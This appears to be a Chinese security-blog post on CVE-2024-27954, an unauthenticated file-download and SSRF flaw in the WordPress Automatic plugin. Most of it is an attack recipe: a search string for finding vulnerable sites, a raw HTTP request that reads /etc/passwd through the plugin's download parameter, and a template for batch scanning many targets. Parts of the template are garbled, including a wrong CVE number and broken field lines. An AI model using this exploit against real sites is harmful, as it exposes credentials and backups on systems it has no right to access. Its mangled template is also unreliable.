漏洞简介
WordPress Automatic 插件<3.92.1易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件。此漏洞已在3.92.1版本中修补。
漏洞复现
步骤一:使用以下语法搜索资产并确定测试目标...
# 搜索语法
"/wp-content/plugins/wp-automatic"
步骤二:向目标中发送以下数据包并在相应包中返回读取文件的内容...或直接凭借访问URL也可...
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
批量脚本
id: CVE-2024-27954
info:
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
author: LY
severity: critical
description: |
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
reference:
https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
classification:
9.8 :
CVE-2022-1970 :
CWE-918 :
metadata:
verified: true
1 :
"/wp-content/plugins/wp-automatic" :
tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
http:
method: GET
path:
"{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
and :
matchers:
type: word
part: body
words:
'"link":"file:'
type: regex
regex:
"root:.*:0:0:"
# digest: 4b0a00483046022100f4561d82424240be6c3dc4fc29a070e44885e39d14ffcdbddae881eeaf89d958022100cf500bf58250d2b5bf2a94220a8afcd8531d91b7d914c46d485700c5558887ac:922c64590222798bb761d5b6d8e72950
原文始发于微信公众号(揽月安全团队):CVE-2024-27954:WordPress Automatic 插件任意文件下载和SSRF漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论